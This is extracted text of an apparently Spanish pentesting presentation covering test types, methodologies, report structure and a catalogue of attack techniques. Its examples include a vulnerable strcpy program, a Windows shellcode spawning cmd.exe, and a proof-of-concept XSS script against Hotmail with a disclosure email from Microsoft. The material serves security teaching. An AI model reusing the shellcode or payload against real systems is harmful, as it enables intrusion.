SlideShare une entreprise Scribd logo
1  sur  20
Télécharger pour lire hors ligne
1. 20 Min: Que es un Pentest?

2. 40 Min: Be a Lulzsec guy for a while!!!!

3. 60 Min: Better than anonymous!!!.

4. 20 Min: Preguntas y respuestas.
1. RIESGOS DE LA SEGURIDAD CORPORATIVA

2. PRUEBAS DE PENETRACION

3. TIPOS DE PRUEBAS

4. ESTRUCTURA DE UN PENTEST

5. TECNICAS BASICAS DE HACKEO

6. HACKING !!!!!

7. CONCLUSIONES
PROBLEMAS

•   En la experiencia general el 98% de las empresas son muy vulnerables a ataques simples, el 2 %
    restante son vulnerables a ataques especializados.
•   El mismo numero 98% desconoce la forma de pensar y las técnicas usadas por los atacantes.
•   En la actualidad el hacking ha crecido mas como una actividad delictiva y enfocada a ciertos
    blancos.
•   El hacker tiene todo el tiempo que desee para buscar la forma de atacar y solo tiene que
    encontrar 1 error, el CSO tiene muchas responsabilidades y verificar cada paso y proceso
    tecnológico y solo tiene que cometer 1 error.

RIESGOS

•   Reputación, perdida de confianza e imagen.
•   Perdida o modificación de datos.
•   Incumplimiento de regulaciones (SOX, CNBV, LFPDPPP, etc.)
•   Robo de identidad o datos sensibles (Datos Identificables, Crediticios, Patrimoniales, etc.)
•   Espionaje industrial.
•   Muchos Otros…
OBJETIVOS

•   En las prueba de penetración se actúa como atacante malicioso, tomándose el tiempo necesario
    de buscar todas las vulnerabilidades posibles, para preparar y evaluar la empresa para resistir
    ataques comunes y dirigidos.

FINALIDAD

•   Lograr el acceso con el máximo privilegio posible a través de conocimientos técnicos avanzados
    con un equipo multidisciplinario (Tiger Teaming), a datos privados y sensibles, apoyando con
    soluciones para permitir minimizar el riesgo y determinar las posibilidades reales de un ataque.

REQUERIMIENTOS PARA EL CONSULTOR

•   Conocimiento de redes.
•   Conocimiento de sistemas operativos.
•   Conocimiento de desarrollo.
•   Conocimiento de ingeniería en reversa.
•   Conocimiento de herramientas.
•   Conocimiento de °!#$#&&/&()&))==?((#234
GENERAL (EXTERNA O INTERNA)
 • WHITE BOX
     • Con el conocimiento de la infraestructura.
     • Tiene menos riesgos pues se sabe que sistemas atacar y por donde.

 • GREY BOX
     • Conocimiento parcial de la infraestructura.
     • Tienes riesgos bajos ya que abra que hacer intentos de prueba y error.

 • BLACK BOX
     • Sin conocimiento alguno de la infraestructura.
     • Implica un riesgo alto, ya que no solo alentar las comunicaciones por el trafico a generarse al hacer
       trabajo intenso de búsquedas, si no que también corre riesgos al poder detener la producción completa
       de una empresa con ataques no esperados.

ESPECIALIZADA
     •   Web Application Penetration Test.
     •   Application Vulnerability Assessment.
     •   Source Code Security Analysis.
     •   Wi-Fi Penetration Testing
     •   Social Engineering.
     •   Physical Security.
     •   Industrial Espionage.
     •   Vulnerability Assessment.
Existen diversas metodologías de seguridad a seguir:
•   Open Source Security Testing Methodology Manual (OSSTMM)
•   Open Web Application Security Project (OWASP)
•   National Institute of Standards and Technology-SP800-115 (NIST)
•   Information Systems Security Assessment Framework (ISSAF)

Que se hace en un Pentest?



    1.- Objetivos                          2.- Recopilación           3.- Enumeración
    •Establecer metas.                     •Google, DNS, Footprint.   •Port Scanning, Vuln Scan
    •Establecer blancos.                   •Social Engineering.       •Services & Applications
    •Detectar necesidades                  •Metadatos (Archivos)      •Users & Groups




    4.- Explotación                         5.- Documentación         6.- Dark Side Hacker
    •System Hacking                         •Executive Summary        •Root kits, Key loggers
    •Evidence                               •Technical Details        •Evidence Cleaning
    •Physical Intrusion                     •Recommendations          •Access Concession
Que debe contener un reporte de un Pen Test:
•   Introduction
      •   Testing Team Details (Names, Contacts, Expertise)
      •   Client Details (Details: network, servers, workstations, AD)
      •   Scope of Testing
            •    Purpose & Type (Assessment, New Implementation, Compliance, Security Pen Test)
            •    Category (White box, Black Box, Grey Box)
•   Executive Summary (Brief)
•   Security Issues (With Critical level)
      •   OS
            •    Exploited & Unexploited
      •   Application & Web
            •    Exploited & Unexploited
      •   Physical (Facilities)
            •    Exploited & Unexploited
      •   Personnel (Social Engineering)
            •    Exploited & Unexploited
      •   General
            •    Exploited & Unexploited
•   Technical Summary
      •   OS Security, Web Security, Database Security, Application Security, Business Security , Policies and
          Procedures
•   Risk & Recommendations
"You don't know the power of the dark side!"

                                -Darth Vader
•   DOS, DDOS                            Man in The Middle
•   Buffer Overflows                       – ARP Poisoning
      – Stack Overflows                    – SMB Relay
      – Heap Overflows                     – HTTPS y SSH Relay
      – Smashing the Stack
      – Adjacent Memory                  Wireless Hacking
      – Off by One                       Parameter Tampering
                                         Information Disclosure
   Race Conditions                      Landscape Discovery
   Format Strings                          – Portscanning
   Double Frees                            – Banner Grabing
   Null Sessions                           – Service Discovery
   Spoofing
   Sniffing                             Virus & Cracking
   Zapping                                 – Worms
   Brute Forcing                           – Backdoors
   Web                                     – Caballos de Troya
      – Sql Injections                      – Debugging
      – XXS Cross Scripting Site            – Dissasembling
      – Session Hijacking                   – Unpacking
      – Cookie hijacking &poisoning
      – PHP/ASP File Inclusion
      – PHP/ASP Includes                 Steganografia
      – PHP/ASP Null Byte                Alternate Data Streams (file systems)
      – PHP Global Vars                  Email Hacking
      – Alternate Data Stream               – Frame Relay
      – Google Hacking                      – Identity Thief
PHP/ASP
    Inclusión de Archivos
    Archivos de Backup (.BAK .INC ETC)
    Inyección de código PHP
    Errores de Configuración
    Mala Técnica de Programación
    SQL Injection
    Cross Site Scripting
Break 5 minutos

Encontraran algo????
•   Definición

     –   Insertar datos mas grandes que el máximo alocado en memoria, dando esto en el cambio de flujo del programa ya sea
         por corrupción del Extended Instruction Pointer (EIP) o funciones corruptas (Heap)


•   Porque Existen los BO

     –   La forma en que la creación de sistemas operativos se enseña provee una optimización de lectura y
         escritura en la memoria, por lo cual es espacio se aloca de izquierda a derecha y se escribe en forma
         inversa.

     –   Cada ves que un programa ejecuta una rutina el sistema operativo hace lo siguiente:

           •     Guardar la dirección de la siguiente instrucción valida en EIP (4 Bytes, 0x77777777)
           •     Guardar la dirección de las variables dentro de un puntero en EBP (4 Bytes, 0x77777777)
           •     Alocar espacio para las variables de la función que se esta llamando (Depende del Buffer)
           •     Una ves terminada la función, se llama al código que punta EIP (Valor guardado)
           •     Y así sucesivamente…….


     –   Por lo que si tomamos control de EIP, podemos decir que al terminar la función el programa ejecute
         como siguiente código lo que el hacker quiera.
#include <stdio.h>
             #include <string.h>

             int main(int argc, char **argv) {
             char buffer[20];
             strcpy(buffer, argv[1]);
             printf("%sn", buffer);
             }
0xC0000005




                                                 0x45DF33AD

                                                                 0x65D537AB




                                                              NOTA: Algunos compiladores crean un padding de algunos bytes para evitar el BO.
            Técnicas Básicas:
               Jump Into the Stack (la mas común utilizada en Linux)
                        Consiste en saltar directamente al payload o shellcode.


                  Call Jump Stack (La mas común utilizada en Windows)
                        Consiste en saltar a una dirección estática de memoria que a su ves
                         apunta a la direccion de nuestro payload o shellcode
0xC0000005




                                                     0x41414141

                                                                     0x41414141




                                                                                  “AAAAAAAAAAAAAAAAAAAAAAAAAA”

                                                                                     Dirección de la escritura en la memoria.




                                                                  NOTA: Algunos compiladores crean un padding de algunos bytes para evitar el BO.
System(cmd.exe)

“x55x8BxECx33xFFx57x83xECx08xC6x45xF8x63xC6x45xF9x6DxC6x45xFAx64xC6x45xFBx2ExC6x45xFCx65xC6x45xFDx78xC6x4
5xFEx65x8Dx45x F8Xbbx44x80xBFx77xFFxD3”




  System(cmd.exe)

  0040B4EC |. 55                                  PUSH EBP # Aquí empieza nuestra shellcode
  0040B4ED |. 8BEC              MOV EBP,ESP
  0040B4EF |. 33FF                                XOR EDI,EDI
  0040B4F1 |. 57                                  PUSH EDI
  0040B4F2 |. 83EC 08           SUB ESP,8
  0040B4F5 |. C645 F8 63        MOV BYTE PTR SS:[EBP-8],63 # ”C”
  0040B4F9 |. C645 F9 6D        MOV BYTE PTR SS:[EBP-7],6D # ”M”
  0040B4FD |. C645 FA 64        MOV BYTE PTR SS:[EBP-6],64 # ”D”
  0040B501 |. C645 FB 2E        MOV BYTE PTR SS:[EBP-5],2E # ”.”
  0040B505 |. C645 FC 65        MOV BYTE PTR SS:[EBP-4],65 # ”E”
  0040B509 |. C645 FD 78        MOV BYTE PTR SS:[EBP-3],78 # ”X”
  0040B50D |. C645 FE 65        MOV BYTE PTR SS:[EBP-2],65 # ”E”
  0040B511 |. 8D45 F8           LEA eax,DWORD PTR SS:[EBP-8] #”CMD.EXE”
  0040B514 |. 50                PUSH eax
  0040B515 |. BB 4480BF77       MOV EBX, 76FDAB6B # Direccion del system() msvcrt.dll VISTA ESPAÑOL
  0040B51A |. FFD3              CALL EBX # EJECUTA SYSTEM CON CMD.EXE DE PARAMETRO
“Hack the planet”
Si no conoces hackers y no sabes como romper y atacar sistemas, como
esperas defenderte de ello?


No es ser un genio, es solo el gusto de aprender.



Ya no hay investigación ni desarrollo, se necesita mas gente interesada
La mayoría de los avances tecnológicos han sido gracias a los hackers.
Los consultores de seguridad están prostituidos, cuantos realmente saben
hacer exploits y son buenos técnicamente y cuantos, solo tienen el titulo o la
certificación por saber usar herramientas ya hechas. (ósea nada nuevo)



SQL Injection = Lulzsec & anonymous
De: Microsoft Security Response Center
 Fallos XXS Hackeando Hotmail 26 de Abril 2005                         [mailto:secure@microsoft.com]
  Hotmail Cross Site Message Explore                                   Enviado el: miércoles, 07 de septiembre de 2005 11:17
                                                                        Para: Luis A. Cortes Zavala
                                                                        CC: Microsoft Security Response Center
Proof of Concept                                                        Asunto: RE: failure notice [MSRC 5937sd]
Hotmail Cross Site Message Explorer by NaPa
Security Nation Labs – México
                                                                        Thanks for the fast reply Luis,
-----------------------------------------------------------------
<html>                                                                  OK no problems I will provide you with an update
<head>
</head>
                                                                        when the team turns on the "a" attribute at the end
<body>                                                                  of October.
<script>
str1=document.URL;
str2=str1.split("?");
                                                                        Its something we have difficulty with acknowledging
str3=str2[1];                                                           finders for our online services, as we don't issue a
str4=str3.split("&");                                                   security bulletin for them.
str5="http://by17fd.bay17.hotmail.msn.com/cgibin/
getmsg?msg=&start=&len=&mfs=&cmd=next&lastmsgid=";
str6=str4[2];                                                           I apologize for this, maybe once this is all over you
str7=str6.split("=");                                                   can present at any conference and discuss this issue
str8=str7[1];
str9="&msgread=&etype=&wo=";
                                                                        and how we went from a bad situation to a great
str10=str5+str8+str9+"&"+str4[0]+"&"+str4[1]                            outcome and you were the researcher the whole
window.open(str10);                                                     way along who worked with Microsoft to secure its
</script>
hola napa
                                                                        online systems? I don't know I am just thinking
</body>                                                                 aloud...
</html>
---------------------------------------------------------------------
                                                                        Cheers
                                                                        Scott D.
Pentest - El Arte de la Guerra

Contenu connexe

Tendances

Elias Grande - Dagda [rootedvlc4]
Elias Grande - Dagda [rootedvlc4]Elias Grande - Dagda [rootedvlc4]
Elias Grande - Dagda [rootedvlc4]RootedCON
 
Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]
Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]
Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]RootedCON
 
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]RootedCON
 
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]RootedCON
 
Daniel González & Helena Jalain - DevSecOps y la caída de Babilonia: cómo olv...
Daniel González & Helena Jalain - DevSecOps y la caída de Babilonia: cómo olv...Daniel González & Helena Jalain - DevSecOps y la caída de Babilonia: cómo olv...
Daniel González & Helena Jalain - DevSecOps y la caída de Babilonia: cómo olv...RootedCON
 
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]RootedCON
 
Marc Fernandez - Auditando aplicaciones iOS [rooted2018]
Marc Fernandez - Auditando aplicaciones iOS [rooted2018]Marc Fernandez - Auditando aplicaciones iOS [rooted2018]
Marc Fernandez - Auditando aplicaciones iOS [rooted2018]RootedCON
 
David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]
David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]
David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]RootedCON
 
Eduardo Sanchez & Rafael Sojo - Taller de CTF [rooted2018]
Eduardo Sanchez & Rafael Sojo - Taller de CTF [rooted2018]Eduardo Sanchez & Rafael Sojo - Taller de CTF [rooted2018]
Eduardo Sanchez & Rafael Sojo - Taller de CTF [rooted2018]RootedCON
 
Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...
Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...
Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...RootedCON
 
Pentesting 101 por Paulino Calderon
Pentesting 101 por Paulino CalderonPentesting 101 por Paulino Calderon
Pentesting 101 por Paulino CalderonWebsec México, S.C.
 
José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...
José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...
José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...VOIP2DAY
 
Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamar
Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamarEvasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamar
Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamarINCIDE
 
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro JoaquínCPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro JoaquínWebsec México, S.C.
 
Sergio De Los Santos - BREAKING OUT HSTS (AND HPKP) ON FIREFOX, IE/EDGE AND (...
Sergio De Los Santos - BREAKING OUT HSTS (AND HPKP) ON FIREFOX, IE/EDGE AND (...Sergio De Los Santos - BREAKING OUT HSTS (AND HPKP) ON FIREFOX, IE/EDGE AND (...
Sergio De Los Santos - BREAKING OUT HSTS (AND HPKP) ON FIREFOX, IE/EDGE AND (...RootedCON
 
Ramón Pinuaga - Authenticode para malotes [rooted2017]
Ramón Pinuaga - Authenticode para malotes [rooted2017]Ramón Pinuaga - Authenticode para malotes [rooted2017]
Ramón Pinuaga - Authenticode para malotes [rooted2017]RootedCON
 

Tendances (18)

Elias Grande - Dagda [rootedvlc4]
Elias Grande - Dagda [rootedvlc4]Elias Grande - Dagda [rootedvlc4]
Elias Grande - Dagda [rootedvlc4]
 
Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]
Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]
Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]
 
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
 
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]
 
Daniel González & Helena Jalain - DevSecOps y la caída de Babilonia: cómo olv...
Daniel González & Helena Jalain - DevSecOps y la caída de Babilonia: cómo olv...Daniel González & Helena Jalain - DevSecOps y la caída de Babilonia: cómo olv...
Daniel González & Helena Jalain - DevSecOps y la caída de Babilonia: cómo olv...
 
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
 
Marc Fernandez - Auditando aplicaciones iOS [rooted2018]
Marc Fernandez - Auditando aplicaciones iOS [rooted2018]Marc Fernandez - Auditando aplicaciones iOS [rooted2018]
Marc Fernandez - Auditando aplicaciones iOS [rooted2018]
 
David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]
David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]
David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]
 
Eduardo Sanchez & Rafael Sojo - Taller de CTF [rooted2018]
Eduardo Sanchez & Rafael Sojo - Taller de CTF [rooted2018]Eduardo Sanchez & Rafael Sojo - Taller de CTF [rooted2018]
Eduardo Sanchez & Rafael Sojo - Taller de CTF [rooted2018]
 
Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...
Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...
Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...
 
Pentesting 101 por Paulino Calderon
Pentesting 101 por Paulino CalderonPentesting 101 por Paulino Calderon
Pentesting 101 por Paulino Calderon
 
Pimp your Android. Rooted CON 2012.
Pimp your Android. Rooted CON 2012.Pimp your Android. Rooted CON 2012.
Pimp your Android. Rooted CON 2012.
 
José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...
José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...
José Luis Verdeguer - VoIP2DAY 2016 | Analizando la seguridad de los producto...
 
Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamar
Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamarEvasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamar
Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamar
 
Kali linux v2_re_y_des
Kali linux v2_re_y_desKali linux v2_re_y_des
Kali linux v2_re_y_des
 
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro JoaquínCPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
 
Sergio De Los Santos - BREAKING OUT HSTS (AND HPKP) ON FIREFOX, IE/EDGE AND (...
Sergio De Los Santos - BREAKING OUT HSTS (AND HPKP) ON FIREFOX, IE/EDGE AND (...Sergio De Los Santos - BREAKING OUT HSTS (AND HPKP) ON FIREFOX, IE/EDGE AND (...
Sergio De Los Santos - BREAKING OUT HSTS (AND HPKP) ON FIREFOX, IE/EDGE AND (...
 
Ramón Pinuaga - Authenticode para malotes [rooted2017]
Ramón Pinuaga - Authenticode para malotes [rooted2017]Ramón Pinuaga - Authenticode para malotes [rooted2017]
Ramón Pinuaga - Authenticode para malotes [rooted2017]
 

En vedette

Presentación corporativa del Grupo PR Noticias
Presentación corporativa del Grupo PR NoticiasPresentación corporativa del Grupo PR Noticias
Presentación corporativa del Grupo PR NoticiasMarcodeComunicacion
 
Familienfreundlichkeit in Europa heute
Familienfreundlichkeit in Europa heuteFamilienfreundlichkeit in Europa heute
Familienfreundlichkeit in Europa heuteI W
 
Steve McLean, PCG Education Subject Matter Expert
Steve McLean, PCG Education Subject Matter ExpertSteve McLean, PCG Education Subject Matter Expert
Steve McLean, PCG Education Subject Matter ExpertPublic Consulting Group
 
Organizational Development Model
Organizational Development ModelOrganizational Development Model
Organizational Development ModelScholar Consultants
 
Campeonato esquila ponce-maffei
Campeonato esquila ponce-maffeiCampeonato esquila ponce-maffei
Campeonato esquila ponce-maffeiLaura Maffei
 
Construkt festival at bal what makes entrepreneurs entrepreneurial
Construkt festival at bal  what makes entrepreneurs entrepreneurialConstrukt festival at bal  what makes entrepreneurs entrepreneurial
Construkt festival at bal what makes entrepreneurs entrepreneurialAhimanikya Satapathy
 
Mediacom response to Dish Network (Motion to dismiss)
Mediacom response to Dish Network (Motion to dismiss)Mediacom response to Dish Network (Motion to dismiss)
Mediacom response to Dish Network (Motion to dismiss)Kraig Beahn
 
Urbanización de favelas: lecciones de Brasil, Fernanda Magalhães y Francesco ...
Urbanización de favelas: lecciones de Brasil, Fernanda Magalhães y Francesco ...Urbanización de favelas: lecciones de Brasil, Fernanda Magalhães y Francesco ...
Urbanización de favelas: lecciones de Brasil, Fernanda Magalhães y Francesco ...Graciela Mariani
 
historia del poker
historia del pokerhistoria del poker
historia del pokermeyner
 
Sales presentation india 2016 v1
Sales presentation india 2016 v1Sales presentation india 2016 v1
Sales presentation india 2016 v1Pieter Jan De Kroon
 
Clasificación de animales
Clasificación de animalesClasificación de animales
Clasificación de animalesSeilaGlezpelaez
 
The Declaration of Independence by David Deis
The Declaration of Independence by David DeisThe Declaration of Independence by David Deis
The Declaration of Independence by David DeisPeter Pappas
 

En vedette (20)

BOE
BOEBOE
BOE
 
Presentación corporativa del Grupo PR Noticias
Presentación corporativa del Grupo PR NoticiasPresentación corporativa del Grupo PR Noticias
Presentación corporativa del Grupo PR Noticias
 
Familienfreundlichkeit in Europa heute
Familienfreundlichkeit in Europa heuteFamilienfreundlichkeit in Europa heute
Familienfreundlichkeit in Europa heute
 
Steve McLean, PCG Education Subject Matter Expert
Steve McLean, PCG Education Subject Matter ExpertSteve McLean, PCG Education Subject Matter Expert
Steve McLean, PCG Education Subject Matter Expert
 
Organizational Development Model
Organizational Development ModelOrganizational Development Model
Organizational Development Model
 
Der anbruch des fruhlings
Der anbruch des fruhlingsDer anbruch des fruhlings
Der anbruch des fruhlings
 
Campeonato esquila ponce-maffei
Campeonato esquila ponce-maffeiCampeonato esquila ponce-maffei
Campeonato esquila ponce-maffei
 
A544533
A544533A544533
A544533
 
S3 Administration Reception
S3  Administration    ReceptionS3  Administration    Reception
S3 Administration Reception
 
Construkt festival at bal what makes entrepreneurs entrepreneurial
Construkt festival at bal  what makes entrepreneurs entrepreneurialConstrukt festival at bal  what makes entrepreneurs entrepreneurial
Construkt festival at bal what makes entrepreneurs entrepreneurial
 
Mediacom response to Dish Network (Motion to dismiss)
Mediacom response to Dish Network (Motion to dismiss)Mediacom response to Dish Network (Motion to dismiss)
Mediacom response to Dish Network (Motion to dismiss)
 
Urbanización de favelas: lecciones de Brasil, Fernanda Magalhães y Francesco ...
Urbanización de favelas: lecciones de Brasil, Fernanda Magalhães y Francesco ...Urbanización de favelas: lecciones de Brasil, Fernanda Magalhães y Francesco ...
Urbanización de favelas: lecciones de Brasil, Fernanda Magalhães y Francesco ...
 
historia del poker
historia del pokerhistoria del poker
historia del poker
 
6th Wave members Middle East Digital Ecosystems Living Lab
6th Wave members Middle East Digital Ecosystems Living Lab6th Wave members Middle East Digital Ecosystems Living Lab
6th Wave members Middle East Digital Ecosystems Living Lab
 
Sales presentation india 2016 v1
Sales presentation india 2016 v1Sales presentation india 2016 v1
Sales presentation india 2016 v1
 
Cortafuegos
CortafuegosCortafuegos
Cortafuegos
 
Van y tir ae
Van y tir aeVan y tir ae
Van y tir ae
 
Clasificación de animales
Clasificación de animalesClasificación de animales
Clasificación de animales
 
Historia de la ingeniería humana ergonomia
Historia de la ingeniería humana ergonomiaHistoria de la ingeniería humana ergonomia
Historia de la ingeniería humana ergonomia
 
The Declaration of Independence by David Deis
The Declaration of Independence by David DeisThe Declaration of Independence by David Deis
The Declaration of Independence by David Deis
 

Similaire à Pentest - El Arte de la Guerra

Pen test: El arte de la guerra
Pen test: El arte de la guerraPen test: El arte de la guerra
Pen test: El arte de la guerraFutura Networks
 
Laboratorios de Entrenamiento en Seguridad Informática - FLISOL 2010
Laboratorios de Entrenamiento en Seguridad Informática - FLISOL 2010Laboratorios de Entrenamiento en Seguridad Informática - FLISOL 2010
Laboratorios de Entrenamiento en Seguridad Informática - FLISOL 20104v4t4r
 
Hack & beers lleida seguridad en desarrollo fullstack
Hack & beers lleida   seguridad en desarrollo fullstackHack & beers lleida   seguridad en desarrollo fullstack
Hack & beers lleida seguridad en desarrollo fullstackMarc Pàmpols
 
Análisis Forense Memoria RAM
Análisis Forense Memoria RAMAnálisis Forense Memoria RAM
Análisis Forense Memoria RAMConferencias FIST
 
STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)
STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)
STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)Iván Portillo
 
Ethical hacking udem
Ethical hacking udemEthical hacking udem
Ethical hacking udemUdem
 
Construyendo tu propio laboratorio de pentesting
Construyendo tu propio laboratorio de pentestingConstruyendo tu propio laboratorio de pentesting
Construyendo tu propio laboratorio de pentestingJaime Andrés Bello Vieda
 
Seguridad en Servidores Dedicados
Seguridad en Servidores DedicadosSeguridad en Servidores Dedicados
Seguridad en Servidores DedicadosNominalia
 
Hacking Drupal - Anatomía de una auditoría de seguridad
Hacking Drupal - Anatomía de una auditoría de seguridadHacking Drupal - Anatomía de una auditoría de seguridad
Hacking Drupal - Anatomía de una auditoría de seguridadzekivazquez
 
Seguridad en los videojuegos - GoD Mode
Seguridad en los videojuegos - GoD ModeSeguridad en los videojuegos - GoD Mode
Seguridad en los videojuegos - GoD ModeZink Security
 
Ponencia sql avanzado y automatizado
Ponencia sql avanzado y automatizadoPonencia sql avanzado y automatizado
Ponencia sql avanzado y automatizadon3xasec
 
Extendiendo la seguridad en Elastix con Snort IDS/IPS
Extendiendo la seguridad en Elastix con Snort IDS/IPSExtendiendo la seguridad en Elastix con Snort IDS/IPS
Extendiendo la seguridad en Elastix con Snort IDS/IPSPaloSanto Solutions
 
Mejores prácticas desarrollo de base de datos
Mejores prácticas desarrollo de base de datos Mejores prácticas desarrollo de base de datos
Mejores prácticas desarrollo de base de datos Eduardo Castro
 
LOG craziness: Sistemas SIEM para humanos! [GuadalajaraCON 2013]
LOG craziness: Sistemas SIEM para humanos! [GuadalajaraCON 2013]LOG craziness: Sistemas SIEM para humanos! [GuadalajaraCON 2013]
LOG craziness: Sistemas SIEM para humanos! [GuadalajaraCON 2013]Websec México, S.C.
 
Más responsabilidad y seguridad en tus datos
Más responsabilidad y seguridad en tus datosMás responsabilidad y seguridad en tus datos
Más responsabilidad y seguridad en tus datosscr33d
 
Extendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con SnortExtendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con SnortJuan Oliva
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...RootedCON
 
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...Internet Security Auditors
 

Similaire à Pentest - El Arte de la Guerra (20)

Pen test: El arte de la guerra
Pen test: El arte de la guerraPen test: El arte de la guerra
Pen test: El arte de la guerra
 
Laboratorios de Entrenamiento en Seguridad Informática - FLISOL 2010
Laboratorios de Entrenamiento en Seguridad Informática - FLISOL 2010Laboratorios de Entrenamiento en Seguridad Informática - FLISOL 2010
Laboratorios de Entrenamiento en Seguridad Informática - FLISOL 2010
 
Hack & beers lleida seguridad en desarrollo fullstack
Hack & beers lleida   seguridad en desarrollo fullstackHack & beers lleida   seguridad en desarrollo fullstack
Hack & beers lleida seguridad en desarrollo fullstack
 
Análisis Forense Memoria RAM
Análisis Forense Memoria RAMAnálisis Forense Memoria RAM
Análisis Forense Memoria RAM
 
STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)
STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)
STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)
 
Ethical hacking udem
Ethical hacking udemEthical hacking udem
Ethical hacking udem
 
Construyendo tu propio laboratorio de pentesting
Construyendo tu propio laboratorio de pentestingConstruyendo tu propio laboratorio de pentesting
Construyendo tu propio laboratorio de pentesting
 
